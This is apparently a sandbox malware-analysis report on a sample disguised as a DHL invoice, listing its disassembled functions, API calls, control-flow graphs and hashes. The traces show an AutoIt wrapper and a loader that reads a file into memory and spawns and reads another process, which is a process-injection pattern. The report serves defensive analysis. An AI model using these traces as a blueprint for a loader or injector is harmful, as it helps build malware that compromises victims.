                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileFreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 204039940-0
                                                                                                                        • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                        • Instruction ID: 3b607deba843504abac0bd7b14106f4e8fac877621d2a701deed76a91a568b83
                                                                                                                        • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                        • Instruction Fuzzy Hash: 01A10570E00209EBDB14DFE4C898BEEBBB5BF49304F209169E515BB280D775AE41CB54
                                                                                                                        Function 003310F3 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 153comCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00331BF4
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00331BFC
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00331C07
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00331C12
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00331C1A
                                                                                                                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00331C22
                                                                                                                          • Part of subcall function 00331B4A: RegisterWindowMessageW.USER32(00000004,?,003312C4), ref: 00331BA2
                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0033136A
                                                                                                                        • OleInitialize.OLE32 ref: 00331388
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 003724AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                        • String ID: H$Xp$p
                                                                                                                        • API String ID: 1986988660-2519730203
                                                                                                                        • Opcode ID: 1c9ea5762798be36a71bd9bbe15f54bd1257441d650a33224ff9201e77ef3bd1
                                                                                                                        • Instruction ID: d5d620b313ddd8b131fc1bb3b8c1ab8039807e4c501568be2ab60fb1a230defb
                                                                                                                        • Opcode Fuzzy Hash: 1c9ea5762798be36a71bd9bbe15f54bd1257441d650a33224ff9201e77ef3bd1
                                                                                                                        • Instruction Fuzzy Hash: 9371BFB9911300AFC386EF79AE85A553AE4FB88354754863EE44AFB2B1EB344541CF4C
                                                                                                                        Function 00332C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1224 332c63-332cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00332C91
                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00332CB2
                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00331CAD,?), ref: 00332CC6
                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00331CAD,?), ref: 00332CCF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CreateShow
                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                        • Opcode ID: d158b2af07d2df6de11881d0006795f118ce40641e90d1b6cb83bbe7a35dd3ea
                                                                                                                        • Instruction ID: 98bcb48bdc13650635e317bffa35d1517632f5e214ff3869e6e43d4b0c7a6342
                                                                                                                        • Opcode Fuzzy Hash: d158b2af07d2df6de11881d0006795f118ce40641e90d1b6cb83bbe7a35dd3ea
                                                                                                                        • Instruction Fuzzy Hash: 95F0B7755503907AEB211717AD08E772EBDD7C6F50F00106EFD04E25B0C6711851DAB8
                                                                                                                        Function 00EAF0B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1339 eaf0b8-eaf1db call eacd08 call eaefa8 CreateFileW 1346 eaf1dd 1339->1346 1347 eaf1e2-eaf1f2 1339->1347 1348 eaf292-eaf297 1346->1348 1350 eaf1f9-eaf213 VirtualAlloc 1347->1350 1351 eaf1f4 1347->1351 1352 eaf217-eaf22e ReadFile 1350->1352 1353 eaf215 1350->1353 1351->1348 1354 eaf232-eaf26c call eaefe8 call eadfa8 1352->1354 1355 eaf230 1352->1355 1353->1348 1360 eaf288-eaf290 ExitProcess 1354->1360 1361 eaf26e-eaf283 call eaf038 1354->1361 1355->1348 1360->1348 1361->1360
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAEFA8: Sleep.KERNELBASE(000001F4), ref: 00EAEFB9
                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EAF1D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileSleep
                                                                                                                        • String ID: L4XDR7AIUKBLR75J1E7EAJT
                                                                                                                        • API String ID: 2694422964-2933334646
                                                                                                                        • Opcode ID: 9cb2d06581380c8efa20985d7e5230c3ead38b072c95495f1f5ccaea879e903e
                                                                                                                        • Instruction ID: 1bf7fa1ccec96cbc548f632ad27d3b4ff505b7a2f5bf73efee7b1caaae98b3c8
                                                                                                                        • Opcode Fuzzy Hash: 9cb2d06581380c8efa20985d7e5230c3ead38b072c95495f1f5ccaea879e903e
                                                                                                                        • Instruction Fuzzy Hash: D851A170D04288DAEF11DBE4C858BEEBBB8AF19304F144199E2087B2C1D7B91B49CB65
                                                                                                                        Function 003A2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1363 3a2947-3a29b9 call 371f50 call 3a25d6 call 34fe0b call 335722 call 3a274e call 33511f call 355232 1378 3a29bf-3a29c6 call 3a2e66 1363->1378 1379 3a2a6c-3a2a73 call 3a2e66 1363->1379 1384 3a29cc-3a2a6a call 35d583 call 354983 call 359038 call 35d583 call 359038 * 2 1378->1384 1385 3a2a75-3a2a77 1378->1385 1379->1385 1386 3a2a7c 1379->1386 1389 3a2a7f-3a2b3a call 3350f5 * 8 call 3a3017 call 35e5eb 1384->1389 1388 3a2cb6-3a2cb7 1385->1388 1386->1389 1392 3a2cd5-3a2cdb 1388->1392 1428 3a2b3c-3a2b3e 1389->1428 1429 3a2b43-3a2b5e call 3a2792 1389->1429 1393 3a2cdd-3a2ced call 34fdcd call 34fe14 1392->1393 1394 3a2cf0-3a2cf6 1392->1394 1393->1394 1428->1388 1432 3a2bf0-3a2bfc call 35e678 1429->1432 1433 3a2b64-3a2b6c 1429->1433 1440 3a2bfe-3a2c0d DeleteFileW 1432->1440 1441 3a2c12-3a2c16 1432->1441 1434 3a2b6e-3a2b72 1433->1434 1435 3a2b74 1433->1435 1437 3a2b79-3a2b97 call 3350f5 1434->1437 1435->1437 1445 3a2b99-3a2b9e 1437->1445 1446 3a2bc1-3a2bd7 call 3a211d call 35dbb3 1437->1446 1440->1388 1443 3a2c18-3a2c7e call 3a25d6 call 35d2eb * 2 call 3a22ce 1441->1443 1444 3a2c91-3a2ca5 CopyFileW 1441->1444 1448 3a2cb9-3a2ccf DeleteFileW call 3a2fd8 1443->1448 1468 3a2c80-3a2c8f DeleteFileW 1443->1468 1444->1448 1449 3a2ca7-3a2cb4 DeleteFileW 1444->1449 1451 3a2ba1-3a2bb4 call 3a28d2 1445->1451 1463 3a2bdc-3a2be7 1446->1463 1454 3a2cd4 1448->1454 1449->1388 1461 3a2bb6-3a2bbf 1451->1461 1454->1392 1461->1446 1463->1433 1465 3a2bed 1463->1465 1465->1432 1468->1388
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2C05
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 003A2C87
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A2C9D
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2CAE
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2CC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3226157194-0
                                                                                                                        • Opcode ID: ecb984c9f5c541f62b977f274bcff9d8c0281da36e7f37f55a8731bffa391f79
                                                                                                                        • Instruction ID: b1919587a9f808bc2fbe95d643fb35e7b4fba6b6a37b1427cd801eec91444d05
                                                                                                                        • Opcode Fuzzy Hash: ecb984c9f5c541f62b977f274bcff9d8c0281da36e7f37f55a8731bffa391f79
                                                                                                                        • Instruction Fuzzy Hash: 09B15E72D00119ABDF26DBA8CC85EDFB7BDEF09350F1044A6F909EA151EB319A448F61
                                                                                                                        Function 00365AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1469 365aa9-365ace 1470 365ad7-365ad9 1469->1470 1471 365ad0-365ad2 1469->1471 1473 365afa-365b1f 1470->1473 1474 365adb-365af5 call 35f2c6 call 35f2d9 call 3627ec 1470->1474 1472 365ca5-365cb4 call 350a8c 1471->1472 1475 365b26-365b2c 1473->1475 1476 365b21-365b24 1473->1476 1474->1472 1480 365b2e-365b46 call 35f2c6 call 35f2d9 call 3627ec 1475->1480 1481 365b4b 1475->1481 1476->1475 1479 365b4e-365b53 1476->1479 1484 365b64-365b6d call 36564e 1479->1484 1485 365b55-365b61 call 369424 1479->1485 1520 365c9c-365c9f 1480->1520 1481->1479 1497 365b6f-365b71 1484->1497 1498 365ba8-365bba 1484->1498 1485->1484 1502 365b95-365b9e call 36542e 1497->1502 1503 365b73-365b78 1497->1503 1500 365c02-365c23 WriteFile 1498->1500 1501 365bbc-365bc2 1498->1501 1509 365c25-365c2b GetLastError 1500->1509 1510 365c2e 1500->1510 1505 365bc4-365bc7 1501->1505 1506 365bf2-365c00 call 3656c4 1501->1506 1519 365ba3-365ba6 1502->1519 1507 365b7e-365b8b call 3655e1 1503->1507 1508 365c6c-365c7e 1503->1508 1513 365be2-365bf0 call 365891 1505->1513 1514 365bc9-365bcc 1505->1514 1506->1519 1531 365b8e-365b90 1507->1531 1517 365c80-365c83 1508->1517 1518 365c89-365c99 call 35f2d9 call 35f2c6 1508->1518 1509->1510 1521 365c31-365c3c 1510->1521 1513->1519 1514->1508 1524 365bd2-365be0 call 3657a3 1514->1524 1517->1518 1529 365c85-365c87 1517->1529 1518->1520 1519->1531 1525 365ca4 1520->1525 1522 365ca1 1521->1522 1523 365c3e-365c43 1521->1523 1522->1525 1533 365c45-365c4a 1523->1533 1534 365c69 1523->1534 1524->1519 1525->1472 1529->1525 1531->1521 1538 365c60-365c67 call 35f2a3 1533->1538 1539 365c4c-365c5e call 35f2d9 call 35f2c6 1533->1539 1534->1508 1538->1520 1539->1520
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: JO3
                                                                                                                        • API String ID: 0-1249764312
                                                                                                                        • Opcode ID: cc9c00e0e069c1c60bb2f46ce627244756a19732b255588aa89a3eda4b5a8649
                                                                                                                        • Instruction ID: f8b41dd9f43bdb2f1638203aa30f6a3a69c52a4e0b4efb2be4dea4c2ac513531
                                                                                                                        • Opcode Fuzzy Hash: cc9c00e0e069c1c60bb2f46ce627244756a19732b255588aa89a3eda4b5a8649
                                                                                                                        • Instruction Fuzzy Hash: EB51B075D0060AAFCF239FA8C945FAEBFB8EF05310F158069F805AB2A5D7719901DB61
                                                                                                                        Function 00333B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B40
                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B61
                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                        • Opcode ID: 8ed34c774835aafb1aff53b4d04c69dc4a7834f1019c271e98a17a7e72f670c5
                                                                                                                        • Instruction ID: 8fb63fa251f6ac1061b473c789ead33196ce2d03a474bbc1b6c138ac7689122d
                                                                                                                        • Opcode Fuzzy Hash: 8ed34c774835aafb1aff53b4d04c69dc4a7834f1019c271e98a17a7e72f670c5
                                                                                                                        • Instruction Fuzzy Hash: 4B112AB5520218FFDB228FA5DC84EAEB7BCEF04744F118459F805D7110D231EE409760
                                                                                                                        Function 00EADFA8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00EAE7D5
                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EAE7F9
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EAE81B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2438371351-0
                                                                                                                        • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                                                        • Instruction ID: a6455ed4ab81f1ea26a2d1a0c2f3e425aae45383eb619e6b1733e9619b209a82
                                                                                                                        • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                                                        • Instruction Fuzzy Hash: 9C62FB30A142189BEB24CFA4C855BDEB376EF59304F1091A9E10DFB390E7799E81CB59
                                                                                                                        Function 00333923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003733A2
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00333A04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                        • String ID: Line:
                                                                                                                        • API String ID: 2289894680-1585850449
                                                                                                                        • Opcode ID: 40b4bf24c47543a88945e65b9298fb54657c2544ba64bcbf7fb4c3eb07b55c5d
                                                                                                                        • Instruction ID: 52dd867cd5ab1c447a32eb929afdef3039bfb1d343310a5a193a336fe7bd94c3
                                                                                                                        • Opcode Fuzzy Hash: 40b4bf24c47543a88945e65b9298fb54657c2544ba64bcbf7fb4c3eb07b55c5d
                                                                                                                        • Instruction Fuzzy Hash: 8031B471508304AED327EB20DC86FEBB7DCAB40714F10852EF999970A1DB749649C7C6
                                                                                                                        Function 00332DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00372C8C
                                                                                                                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                                                                                                                          • Part of subcall function 00332DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00332DC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                        • String ID: X$`e?
                                                                                                                        • API String ID: 779396738-120205953
                                                                                                                        • Opcode ID: 902d0b7b29530fec6febb7bf2f560b70efad5d2e127bd0393e02aadc9917be7a
                                                                                                                        • Instruction ID: a08647a86cf70b5c7741f38ee9e50be0ad3252a03f670c2b425926968420999b
                                                                                                                        • Opcode Fuzzy Hash: 902d0b7b29530fec6febb7bf2f560b70efad5d2e127bd0393e02aadc9917be7a
                                                                                                                        • Instruction Fuzzy Hash: 0C21A871A0025C9FDB03EF95C846BEE7BFC9F49304F008059E509BB241DBB855498FA1
                                                                                                                        Function 0034FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00350668
                                                                                                                          • Part of subcall function 003532A4: RaiseException.KERNEL32(?,?,?,0035068A,?,00401444,?,?,?,?,?,?,0035068A,00331129,003F8738,00331129), ref: 00353304
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00350685
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: Unknown exception
                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                        • Opcode ID: af3b3d2cf611c884a675c445610e1dd873b6491151ee75b54851c8814c46ff56
                                                                                                                        • Instruction ID: 74bf20c3046b6127cf791b60c6b2eefe1438901ffe9a36319f8571908a86aebb
                                                                                                                        • Opcode Fuzzy Hash: af3b3d2cf611c884a675c445610e1dd873b6491151ee75b54851c8814c46ff56
                                                                                                                        • Instruction Fuzzy Hash: 00F0283490020D77CB0BB7A4D846C9D77AC9E00341B604830BD14C94B5EF72EA6DC6C0
                                                                                                                        Function 003A3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 003A302F
                                                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003A3044
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                        • String ID: aut
                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                        • Opcode ID: 2d5c6dc921da0cfd9422cd4d97d6b26b208fcae89dfffaa63e2694df721bee0a
                                                                                                                        • Instruction ID: f6bccd1d95f936c5f9f6f02d9b4f4feda6244ad1ef2dc20e8516f25227b581cd
                                                                                                                        • Opcode Fuzzy Hash: 2d5c6dc921da0cfd9422cd4d97d6b26b208fcae89dfffaa63e2694df721bee0a
                                                                                                                        • Instruction Fuzzy Hash: F8D05EB250032867DE20E7A4AC0EFDB3A6CDB04750F0006A1F659E2091DBB0A984CBD0
                                                                                                                        Function 003B7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003B82F5
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 003B82FC
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 003B84DD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
